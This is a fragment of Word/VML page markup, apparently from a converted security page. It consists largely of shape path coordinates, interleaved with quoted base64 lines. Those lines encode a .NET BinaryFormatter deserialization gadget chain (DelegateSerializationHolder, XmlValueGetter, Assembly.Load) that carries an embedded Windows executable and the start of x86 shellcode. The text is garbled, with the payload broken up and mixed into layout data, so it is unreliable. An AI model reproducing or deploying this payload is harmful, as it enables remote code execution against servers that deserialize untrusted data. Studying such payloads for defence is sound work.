4326,2773,14326,2772,14326,2770,14326,2769,14326,2768,14326,2767,14326,2765,14326,2764,14326,2763,14326,2761,14326,2760,14326,2758,14326,2757,14326,2755,14326,2753,14326,2752,14326,2750,14326,2748,14326,2747,14326,2745,14326,2743,14326,2741,14326,2739,14326,2737,14326,2735,14326,2733,14326,2731,14326,2729,14326,2727,14326,2725,14326,2723,14326,2720,14326,2718,14326,2716,14326,2713,14326,2711,14326,2708,14326,2706,14326,2703,14326,2700,14326,2698,14326,2695,14326,2692,14326,2689,14326,2686,14326,2683,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14326,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14325,2680,14324,2680,14324,2680,14324,2680,14324,2680,14323,2680,14323,2680,14323,2680,14322,2680,14322,2680,14321,2680,14321,2680,14320,2680,14320,2680,14319,2680,14319,2680,14318,2680,14317,2680,14317,2680,14316,2680,14315,2680,14314,2680,14313,2680,14312,2680,14311,2680,14310,2680,14309,2680,14308,2680,14307,2680,14306,2680,14305,2680,14304,2680,14302,2680,14301,2680,14300,2680,14298,2680,14297,2680,14295,2680,14294,2680,14292,2680,14290,2680,14288,2680,14287,2680,14285,2680,14283,2680,14281,2680,14279,2680,14276,2680,14274,2680,14272,2680,14270,2680,14267,2680,14265,2680,14262,2680,14260,2680,14257,2680,14254,2680,14252,2680,14249,2680,14246,2680,14243,2680,14240,2680,14236,2680,14233,2680,14230,2680,14227,2680,14223,2680,14219,2680,14216,2680,14212,2680,14208,2680,14204,2680,14200,2680,14196,2680,14192,2680,14188,2680,14184,2680,14179,2680,14175,2680,14170,2680,14166,2680,14161,2680,14156,2680,14151,2680,14146,2680,14141,2680,14136,2680,14130,2680,14125,2680,14119,2680,14114,2680,14108,2680,14102,2680,14096,2680,14090,2680,14084,2680,14077,2680,14071e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:734.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,14690" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:14690;width:130;height:270" coordorigin="2670,14690" coordsize="130,270" path="m2680,14716l2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2680,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2681,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2682,14716,2683,14716,2683,14716,2683,14716,2683,14716,2684,14716,2684,14716,2684,14716,2685,14716,2685,14716,2685,14716,2686,14716,2686,14716,2686,14716,2687,14716,2687,14716,2688,14716,2688,14716,2689,14716,2689,14716,2690,14716,2690,14716,2691,14716,2692,14716,2692,14716,2693,14716,2694,14716,2694,14716,2695,14716,2696,14716,2697,14716,2697,14716,2698,14716,2699,14716,2700,14716,2701,14716,2702,14716,2703,14716,2704,14716,2705,14716,2706,14716,2707,14716,2708,14716,2709,14716,2710,14716,2712,14716,2713,14716,2714,14716,2715,14716,2717,14716,2718,14716,2720,14716,2721,14716,2723,14716,2724,14716,2726,14716,2727,14716,2729,14716,2731,14716,2732,14716,2734,14716,2736,14716,2738,14716,2740,14716,2741,14716,2743,14716,2745,14716,2747,14716,2749,14716,2752,14716,2754,14716,2756,14716,2758,14716,2760,14716,2763,14716,2765,14716,2768,14716,2770,14716,2773,14716,2775,14716,2778,14716,2780,14716,2783,14716,2786,14716,2789,14716,2792,14716,2794,14716,2797,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14716,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14717,2800,14718,2800,14718,2800,14718,2800,14718,2800,14719,2800,14719,2800,14719,2800,14719,2800,14720,2800,14720,2800,14721,2800,14721,2800,14721,2800,14722,2800,14722,2800,14723,2800,14723,2800,14724,2800,14725,2800,14725,2800,14726,2800,14727,2800,14728,2800,14728,2800,14729,2800,14730,2800,14731,2800,14732,2800,14733,2800,14734,2800,14735,2800,14736,2800,14738,2800,14739,2800,14740,2800,14742,2800,14743,2800,14744,2800,14746,2800,14748,2800,14749,2800,14751,2800,14752,2800,14754,2800,14756,2800,14758,2800,14760,2800,14762,2800,14764,2800,14766,2800,14768,2800,14771,2800,14773,2800,14775,2800,14778,2800,14780,2800,14783,2800,14786,2800,14788,2800,14791,2800,14794,2800,14797,2800,14800,2800,14803,2800,14806,2800,14809,2800,14813,2800,14816,2800,14820,2800,14823,2800,14827,2800,14831,2800,14834,2800,14838,2800,14842,2800,14846,2800,14850,2800,14855,2800,14859,2800,14863,2800,14868,2800,14872,2800,14877,2800,14882,2800,14887,2800,14892,2800,14897,2800,14902,2800,14907,2800,14912,2800,14918,2800,14923,2800,14929,2800,14935,2800,14941,2800,14947,2800,14953,2800,14959,2800,14965,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2800,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2799,14972,2798,14972,2798,14972,2798,14972,2798,14972,2798,14972,2797,14972,2797,14972,2797,14972,2797,14972,2796,14972,2796,14972,2795,14972,2795,14972,2795,14972,2794,14972,2794,14972,2793,14972,2793,14972,2793,14972,2792,14972,2792,14972,2791,14972,2790,14972,2790,14972,2789,14972,2789,14972,2788,14972,2787,14972,2787,14972,2786,14972,2785,14972,2784,14972,2783,14972,2783,14972,2782,14972,2781,14972,2780,14972,2779,14972,2778,14972,2777,14972,2776,14972,2775,14972,2774,14972,2773,14972,2772,14972,2770,14972,2769,14972,2768,14972,2767,14972,2765,14972,2764,14972,2763,14972,2761,14972,2760,14972,2758,14972,2757,14972,2755,14972,2753,14972,2752,14972,2750,14972,2748,14972,2747,14972,2745,14972,2743,14972,2741,14972,2739,14972,2737,14972,2735,14972,2733,14972,2731,14972,2729,14972,2727,14972,2725,14972,2723,14972,2720,14972,2718,14972,2716,14972,2713,14972,2711,14972,2708,14972,2706,14972,2703,14972,2700,14972,2698,14972,2695,14972,2692,14972,2689,14972,2686,14972,2683,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14972,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14971,2680,14970,2680,14970,2680,14970,2680,14970,2680,14969,2680,14969,2680,14969,2680,14969,2680,14968,2680,14968,2680,14967,2680,14967,2680,14967,2680,14966,2680,14966,2680,14965,2680,14964,2680,14964,2680,14963,2680,14963,2680,14962,2680,14961,2680,14960,2680,14960,2680,14959,2680,14958,2680,14957,2680,14956,2680,14955,2680,14954,2680,14953,2680,14951,2680,14950,2680,14949,2680,14948,2680,14946,2680,14945,2680,14944,2680,14942,2680,14940,2680,14939,2680,14937,2680,14935,2680,14934,2680,14932,2680,14930,2680,14928,2680,14926,2680,14924,2680,14922,2680,14920,2680,14917,2680,14915,2680,14913,2680,14910,2680,14908,2680,14905,2680,14902,2680,14900,2680,14897,2680,14894,2680,14891,2680,14888,2680,14885,2680,14882,2680,14879,2680,14875,2680,14872,2680,14868,2680,14865,2680,14861,2680,14857,2680,14854,2680,14850,2680,14846,2680,14842,2680,14838,2680,14833,2680,14829,2680,14825,2680,14820,2680,14816,2680,14811,2680,14806,2680,14801,2680,14796,2680,14791,2680,14786,2680,14781,2680,14775,2680,14770,2680,14764,2680,14759,2680,14753,2680,14747,2680,14741,2680,14735,2680,14729,2680,14723,2680,14716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:766.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,15330" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:15330;width:130;height:270" coordorigin="2670,15330" coordsize="130,270" path="m2680,15347l2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2680,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2681,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2682,15347,2683,15347,2683,15347,2683,15347,2683,15347,2684,15347,2684,15347,2684,15347,2685,15347,2685,15347,2685,15347,2686,15347,2686,15347,2686,15347,2687,15347,2687,15347,2688,15347,2688,15347,2689,15347,2689,15347,2690,15347,2690,15347,2691,15347,2692,15347,2692,15347,2693,15347,2694,15347,2694,15347,2695,15347,2696,15347,2697,15347,2697,15347,2698,15347,2699,15347,2700,15347,2701,15347,2702,15347,2703,15347,2704,15347,2705,15347,2706,15347,2707,15347,2708,15347,2709,15347,2710,15347,2712,15347,2713,15347,2714,15347,2715,15347,2717,15347,2718,15347,2720,15347,2721,15347,2723,15347,2724,15347,2726,15347,2727,15347,2729,15347,2731,15347,2732,15347,2734,15347,2736,15347,2738,15347,2740,15347,2741,15347,2743,15347,2745,15347,2747,15347,2749,15347,2752,15347,2754,15347,2756,15347,2758,15347,2760,15347,2763,15347,2765,15347,2768,15347,2770,15347,2773,15347,2775,15347,2778,15347,2780,15347,2783,15347,2786,15347,2789,15347,2792,15347,2794,15347,2797,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15347,2800,15348,2800,15348,2800,15348,2800,15348,2800,15348,2800,15349,2800,15349,2800,15349,2800,15349,2800,15350,2800,15350,2800,15350,2800,15351,2800,15351,2800,15352,2800,15352,2800,15353,2800,15353,2800,15354,2800,15354,2800,15355,2800,15356,2800,15356,2800,15357,2800,15358,2800,15359,2800,15360,2800,15361,2800,15361,2800,15362,2800,15363,2800,15365,2800,15366,2800,15367,2800,15368,2800,15369,2800,15371,2800,15372,2800,15373,2800,15375,2800,15376,2800,15378,2800,15379,2800,15381,2800,15383,2800,15385,2800,15386,2800,15388,2800,15390,2800,15392,2800,15394,2800,15396,2800,15399,2800,15401,2800,15403,2800,15406,2800,15408,2800,15411,2800,15413,2800,15416,2800,15419,2800,15421,2800,15424,2800,15427,2800,15430,2800,15433,2800,15436,2800,15440,2800,15443,2800,15446,2800,15450,2800,15453,2800,15457,2800,15461,2800,15465,2800,15469,2800,15472,2800,15477,2800,15481,2800,15485,2800,15489,2800,15494,2800,15498,2800,15503,2800,15507,2800,15512,2800,15517,2800,15522,2800,15527,2800,15532,2800,15537,2800,15543,2800,15548,2800,15554,2800,15559,2800,15565,2800,15571,2800,15577,2800,15583,2800,15589,2800,15595,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2800,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2799,15602,2798,15602,2798,15602,2798,15602,2798,15602,2798,15602,2797,15602,2797,15602,2797,15602,2797,15602,2796,15602,2796,15602,2795,15602,2795,15602,2795,15602,2794,15602,2794,15602,2793,15602,2793,15602,2793,15602,2792,15602,2792,15602,2791,15602,2790,15602,2790,15602,2789,15602,2789,15602,2788,15602,2787,15602,2787,15602,2786,15602,2785,15602,2784,15602,2783,15602,2783,15602,2782,15602,2781,15602,2780,15602,2779,15602,2778,15602,2777,15602,2776,15602,2775,15602,2774,15602,2773,15602,2772,15602,2770,15602,2769,15602,2768,15602,2767,15602,2765,15602,2764,15602,2763,15602,2761,15602,2760,15602,2758,15602,2757,15602,2755,15602,2753,15602,2752,15602,2750,15602,2748,15602,2747,15602,2745,15602,2743,15602,2741,15602,2739,15602,2737,15602,2735,15602,2733,15602,2731,15602,2729,15602,2727,15602,2725,15602,2723,15602,2720,15602,2718,15602,2716,15602,2713,15602,2711,15602,2708,15602,2706,15602,2703,15602,2700,15602,2698,15602,2695,15602,2692,15602,2689,15602,2686,15602,2683,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15602,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15601,2680,15600,2680,15600,2680,15600,2680,15600,2680,15599,2680,15599,2680,15599,2680,15599,2680,15598,2680,15598,2680,15597,2680,15597,2680,15596,2680,15596,2680,15595,2680,15595,2680,15594,2680,15594,2680,15593,2680,15592,2680,15591,2680,15591,2680,15590,2680,15589,2680,15588,2680,15587,2680,15586,2680,15585,2680,15584,2680,15583,2680,15582,2680,15581,2680,15579,2680,15578,2680,15577,2680,15575,2680,15574,2680,15572,2680,15571,2680,15569,2680,15567,2680,15566,2680,15564,2680,15562,2680,15560,2680,15558,2680,15556,2680,15554,2680,15552,2680,15550,2680,15548,2680,15545,2680,15543,2680,15541,2680,15538,2680,15535,2680,15533,2680,15530,2680,15527,2680,15524,2680,15521,2680,15518,2680,15515,2680,15512,2680,15509,2680,15506,2680,15502,2680,15499,2680,15495,2680,15491,2680,15488,2680,15484,2680,15480,2680,15476,2680,15472,2680,15468,2680,15464,2680,15459,2680,15455,2680,15450,2680,15446,2680,15441,2680,15436,2680,15432,2680,15427,2680,15422,2680,15416,2680,15411,2680,15406,2680,15400,2680,15395,2680,15389,2680,15383,2680,15378,2680,15372,2680,15366,2680,15359,2680,15353,2680,1534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"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0Y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XJnZXQw"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"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ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2F0ZUVu"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"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlc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gkLAAAA"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"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpe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mF0aW9u"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"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lb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WJlclR5"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"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJC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QAAAAYR"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40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"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAA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AoBCwAA"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41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"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c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3RlbS5Y"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42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"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlb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j1iNzdh"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43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"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb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24uQXNz"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"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABQAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAA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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzI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HByb2dy"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"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAVC1CX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"AAAA4AACIQsBCwAADAAAAAYAAAAAAAAOKgAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAA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AAAAAQA"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"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAA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AAAwCkA"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"AEsAAAAAQAAA0AIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAA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50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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAA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51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"AAAALnRleHQAAAAUCgAAACAAAAAMAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAA0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AIAAABA"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52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"AAAABAAAAA4AAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAASAAAAA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53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"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAPApAAAAAAAASAAAAAIABQBEIgAAfAcAAAMAA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"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQgIoB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AAACgAA"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"KAIAAAYAACoAAAAAAAAA/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsI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MHPDQHH"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"4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7f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SR15FiL"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999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999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999l1517,999,1517,999,1517,999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7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7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1,1510,2693,1510,2685,1510,2677,1510,2668,1510,2659,1510,2650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6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6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3,10484,3575,10484,3577,10484,3579,10484,3581,10484,3583,10484,3586,10484,3588,10484,3591,10484,3593,10484,3596,10484,3599,10484,3602,10484,3605,10484,3608,10484,3611,10484,3614,10484,3618,10484,3622,10484,3625,10484,3629,10484,3633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3,1517,3575,1517,3577,1517,3579,1517,3581,1517,3583,1517,3586,1517,3588,1517,3591,1517,3593,1517,3596,1517,3599,1517,3602,1517,3605,1517,3608,1517,3611,1517,3614,1517,3618,1517,3622,1517,3625,1517,3629,1517,3633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0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5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0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0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4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0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2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099,1510,6099,1510,6099,1510,6098,1510,6098,1510,6097,1510,6096,1510,6095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0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2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2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31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6730" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:6730;width:8990;height:630" coordorigin="1490,6730" coordsize="8990,6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8,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6748,10484,6749,10484,6749,10484,6749,10484,6750,10484,6750,10484,6750,10484,6751,10484,6751,10484,6752,10484,6753,10484,6753,10484,6754,10484,6755,10484,6756,10484,6757,10484,6757,10484,6759,10484,6760,10484,6761,10484,6762,10484,6763,10484,6765,10484,6766,10484,6768,10484,6770,10484,6771,10484,6773,10484,6775,10484,6777,10484,6779,10484,6781,10484,6784,10484,6786,10484,6789,10484,6791,10484,6794,10484,6797,10484,6800,10484,6803,10484,6806,10484,6810,10484,6813,10484,6817,10484,6820,10484,6824,10484,6828,10484,6832,10484,6837,10484,6841,10484,6845,10484,6850,10484,6855,10484,6860,10484,6865,10484,6870,10484,6876,10484,6881,10484,6887,10484,6893,10484,6899,10484,6905,10484,6912,10484,6918,10484,6925,10484,6932,10484,6939,10484,6946,10484,6954,10484,6961,10484,6969,10484,6977,10484,6985,10484,6994,10484,7002,10484,7011,10484,7020,10484,7029,10484,7039,10484,7048,10484,7058,10484,7068,10484,7078,10484,7089,10484,7099,10484,7110,10484,7121,10484,7133,10484,7144,10484,7156,10484,7168,10484,7180,10484,7193,10484,7206,10484,7219,10484,7232,10484,7245,10484,7259,10484,7273,10484,7287,10484,7302,10484,7316,10484,7331,10484,7346,10484,7362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7,1510,7377,1510,7377,1510,7377,1510,7377,1510,7377,1510,7376,1510,7376,1510,7376,1510,7376,1510,7375,1510,7375,1510,7374,1510,7374,1510,7373,1510,7373,1510,7372,1510,7371,1510,7370,1510,7369,1510,7369,1510,7368,1510,7367,1510,7365,1510,7364,1510,7363,1510,7362,1510,7360,1510,7359,1510,7357,1510,7356,1510,7354,1510,7352,1510,7350,1510,7348,1510,7346,1510,7344,1510,7341,1510,7339,1510,7336,1510,7334,1510,7331,1510,7328,1510,7325,1510,7322,1510,7319,1510,7315,1510,7312,1510,7308,1510,7305,1510,7301,1510,7297,1510,7293,1510,7289,1510,7284,1510,7280,1510,7275,1510,7270,1510,7265,1510,7260,1510,7255,1510,7249,1510,7244,1510,7238,1510,7232,1510,7226,1510,7220,1510,7214,1510,7207,1510,7200,1510,7193,1510,7186,1510,7179,1510,7171,1510,7164,1510,7156,1510,7148,1510,7140,1510,7131,1510,7123,1510,7114,1510,7105,1510,7096,1510,7086,1510,7077,1510,7067,1510,7057,1510,7047,1510,7036,1510,7026,1510,7015,1510,7004,1510,6992,1510,6981,1510,6969,1510,6957,1510,6945,1510,6932,1510,6919,1510,6907,1510,6893,1510,6880,1510,6866,1510,6852,1510,6838,1510,6824,1510,6809,1510,6794,1510,6779,1510,6763,1510,6747e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:336.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,6730" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:6730;width:30;height:650" coordorigin="1490,6730" coordsize="30,650" path="m1517,6747l1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6747,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6748,1517,6749,1517,6749,1517,6749,1517,6750,1517,6750,1517,6750,1517,6751,1517,6751,1517,6752,1517,6753,1517,6753,1517,6754,1517,6755,1517,6756,1517,6757,1517,6757,1517,6759,1517,6760,1517,6761,1517,6762,1517,6763,1517,6765,1517,6766,1517,6768,1517,6770,1517,6771,1517,6773,1517,6775,1517,6777,1517,6779,1517,6781,1517,6784,1517,6786,1517,6789,1517,6791,1517,6794,1517,6797,1517,6800,1517,6803,1517,6806,1517,6810,1517,6813,1517,6817,1517,6820,1517,6824,1517,6828,1517,6832,1517,6837,1517,6841,1517,6845,1517,6850,1517,6855,1517,6860,1517,6865,1517,6870,1517,6876,1517,6881,1517,6887,1517,6893,1517,6899,1517,6905,1517,6912,1517,6918,1517,6925,1517,6932,1517,6939,1517,6946,1517,6954,1517,6961,1517,6969,1517,6977,1517,6985,1517,6994,1517,7002,1517,7011,1517,7020,1517,7029,1517,7039,1517,7048,1517,7058,1517,7068,1517,7078,1517,7089,1517,7099,1517,7110,1517,7121,1517,7133,1517,7144,1517,7156,1517,7168,1517,7180,1517,7193,1517,7206,1517,7219,1517,7232,1517,7245,1517,7259,1517,7273,1517,7287,1517,7302,1517,7316,1517,7331,1517,7346,1517,7362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33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7350" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:7350;width:8990;height:670" coordorigin="1490,7350" coordsize="8990,67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9,10484,7379,10484,7379,10484,7379,10484,7380,10484,7380,10484,7380,10484,7381,10484,7381,10484,7382,10484,7382,10484,7383,10484,7384,10484,7384,10484,7385,10484,7386,10484,7387,10484,7388,10484,7389,10484,7390,10484,7391,10484,7393,10484,7394,10484,7396,10484,7397,10484,7399,10484,7400,10484,7402,10484,7404,10484,7406,10484,7408,10484,7410,10484,7413,10484,7415,10484,7417,10484,7420,10484,7423,10484,7426,10484,7429,10484,7432,10484,7435,10484,7438,10484,7441,10484,7445,10484,7449,10484,7452,10484,7456,10484,7460,10484,7465,10484,7469,10484,7473,10484,7478,10484,7483,10484,7488,10484,7493,10484,7498,10484,7504,10484,7509,10484,7515,10484,7521,10484,7527,10484,7533,10484,7539,10484,7546,10484,7553,10484,7559,10484,7567,10484,7574,10484,7581,10484,7589,10484,7597,10484,7605,10484,7613,10484,7621,10484,7630,10484,7639,10484,7648,10484,7657,10484,7666,10484,7676,10484,7686,10484,7696,10484,7706,10484,7717,10484,7727,10484,7738,10484,7749,10484,7761,10484,7772,10484,7784,10484,7796,10484,7808,10484,7821,10484,7834,10484,7847,10484,7860,10484,7874,10484,7887,10484,7901,10484,7916,10484,7930,10484,7945,10484,7960,10484,7975,10484,7991,10484,8007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2,1510,8022,1510,8022,1510,8022,1510,8021,1510,8021,1510,8021,1510,8020,1510,8020,1510,8019,1510,8019,1510,8018,1510,8018,1510,8017,1510,8016,1510,8015,1510,8015,1510,8014,1510,8013,1510,8012,1510,8010,1510,8009,1510,8008,1510,8007,1510,8005,1510,8004,1510,8002,1510,8000,1510,7999,1510,7997,1510,7995,1510,7993,1510,7990,1510,7988,1510,7986,1510,7983,1510,7981,1510,7978,1510,7975,1510,7972,1510,7969,1510,7966,1510,7963,1510,7959,1510,7956,1510,7952,1510,7948,1510,7944,1510,7940,1510,7936,1510,7932,1510,7927,1510,7923,1510,7918,1510,7913,1510,7908,1510,7903,1510,7897,1510,7892,1510,7886,1510,7880,1510,7874,1510,7868,1510,7861,1510,7855,1510,7848,1510,7841,1510,7834,1510,7827,1510,7820,1510,7812,1510,7804,1510,7796,1510,7788,1510,7779,1510,7771,1510,7762,1510,7753,1510,7744,1510,7734,1510,7725,1510,7715,1510,7705,1510,7695,1510,7684,1510,7674,1510,7663,1510,7651,1510,7640,1510,7628,1510,7617,1510,7605,1510,7592,1510,7580,1510,7567,1510,7554,1510,7541,1510,7527,1510,7513,1510,7499,1510,7485,1510,7470,1510,7456,1510,7441,1510,7425,1510,7410,1510,7394,1510,7378e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:368.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7370" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:7370;width:30;height:650" coordorigin="1490,7370" coordsize="30,650" path="m1517,7378l1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7378,1517,7379,1517,7379,1517,7379,1517,7379,1517,7380,1517,7380,1517,7380,1517,7381,1517,7381,1517,7382,1517,7382,1517,7383,1517,7384,1517,7384,1517,7385,1517,7386,1517,7387,1517,7388,1517,7389,1517,7390,1517,7391,1517,7393,1517,7394,1517,7396,1517,7397,1517,7399,1517,7400,1517,7402,1517,7404,1517,7406,1517,7408,1517,7410,1517,7413,1517,7415,1517,7417,1517,7420,1517,7423,1517,7426,1517,7429,1517,7432,1517,7435,1517,7438,1517,7441,1517,7445,1517,7449,1517,7452,1517,7456,1517,7460,1517,7465,1517,7469,1517,7473,1517,7478,1517,7483,1517,7488,1517,7493,1517,7498,1517,7504,1517,7509,1517,7515,1517,7521,1517,7527,1517,7533,1517,7539,1517,7546,1517,7553,1517,7559,1517,7567,1517,7574,1517,7581,1517,7589,1517,7597,1517,7605,1517,7613,1517,7621,1517,7630,1517,7639,1517,7648,1517,7657,1517,7666,1517,7676,1517,7686,1517,7696,1517,7706,1517,7717,1517,7727,1517,7738,1517,7749,1517,7761,1517,7772,1517,7784,1517,7796,1517,7808,1517,7821,1517,7834,1517,7847,1517,7860,1517,7874,1517,7887,1517,7901,1517,7916,1517,7930,1517,7945,1517,7960,1517,7975,1517,7991,1517,8007,1517,8023e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:400.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8010" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:8010;width:8990;height:630" coordorigin="1490,8010" coordsize="8990,630" path="m1510,8023l1510,8023,1510,8023,1510,8023,1510,8023,1510,8023,1510,8023,1511,8023,1512,8023,1512,8023,1514,8023,1515,8023,1517,8023,1519,8023,1521,8023,1524,8023,1528,8023,1532,8023,1536,8023,1541,8023,1546,8023,1552,8023,1559,8023,1566,8023,1575,8023,1583,8023,1593,8023,1603,8023,1615,8023,1627,8023,1640,8023,1654,8023,1668,8023,1684,8023,1701,8023,1719,8023,1738,8023,1758,8023,1780,8023,1802,8023,1826,8023,1851,8023,1877,8023,1904,8023,1933,8023,1963,8023,1995,8023,2028,8023,2063,8023,2099,8023,2136,8023,2175,8023,2216,8023,2259,8023,2303,8023,2348,8023,2396,8023,2445,8023,2496,8023,2549,8023,2604,8023,2660,8023,2719,8023,2779,8023,2841,8023,2906,8023,2972,8023,3041,8023,3112,8023,3184,8023,3259,8023,3336,8023,3416,8023,3498,8023,3582,8023,3668,8023,3757,8023,3848,8023,3941,8023,4037,8023,4136,8023,4236,8023,4340,8023,4446,8023,4555,8023,4666,8023,4780,8023,4897,8023,5017,8023,5139,8023,5264,8023,5392,8023,5523,8023,5657,8023,5793,8023,5933,8023,6076,8023,6222,8023,6370,8023,6522,8023,6677,8023